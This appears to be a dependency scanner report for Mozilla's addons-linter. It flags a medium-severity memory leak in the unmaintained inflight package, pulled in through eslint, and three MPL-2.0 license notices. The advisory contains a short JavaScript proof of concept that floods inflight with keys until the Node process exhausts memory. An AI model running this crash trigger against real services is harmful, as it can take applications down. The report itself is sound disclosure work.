Vulnerabilities

1 via 1 paths

Dependencies

206

Source

GitHub

Commit

11b32a6c

Find, fix and prevent vulnerabilities in your code.

Issue type
  • 1
  • 3
Severity
  • 4
Status
  • 4
  • 0
  • 0

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: eslint@8.57.1

Detailed paths

  • Introduced through: addons-linter@mozilla/addons-linter#11b32a6c38f898305c31d12359e1569cf620794a eslint@8.57.1 file-entry-cache@6.0.1 flat-cache@3.2.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6

Overview

Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres function due to improperly deleting keys from the reqs object after execution of callbacks. This behavior causes the keys to remain in the reqs object, which leads to resource exhaustion.

Exploiting this vulnerability results in crashing the node process or in the application crash.

Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.

To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.

PoC

const inflight = require('inflight');

function testInflight() {
  let i = 0;
  function scheduleNext() {
    let key = `key-${i++}`;
    const callback = () => {
    };
    for (let j = 0; j < 1000000; j++) {
      inflight(key, callback);
    }

    setImmediate(scheduleNext);
  }


  if (i % 100 === 0) {
    console.log(process.memoryUsage());
  }

  scheduleNext();
}

testInflight();

Remediation

There is no fixed version for inflight.

References

medium severity

MPL-2.0 license

  • Module: addons-moz-compare
  • Introduced through: addons-moz-compare@1.3.0

Detailed paths

  • Introduced through: addons-linter@mozilla/addons-linter#11b32a6c38f898305c31d12359e1569cf620794a addons-moz-compare@1.3.0

MPL-2.0 license

medium severity

MPL-2.0 license

  • Module: addons-scanner-utils
  • Introduced through: addons-scanner-utils@9.12.0

Detailed paths

  • Introduced through: addons-linter@mozilla/addons-linter#11b32a6c38f898305c31d12359e1569cf620794a addons-scanner-utils@9.12.0

MPL-2.0 license

medium severity

MPL-2.0 license

  • Module: eslint-plugin-no-unsanitized
  • Introduced through: eslint-plugin-no-unsanitized@4.1.2

Detailed paths

  • Introduced through: addons-linter@mozilla/addons-linter#11b32a6c38f898305c31d12359e1569cf620794a eslint-plugin-no-unsanitized@4.1.2

MPL-2.0 license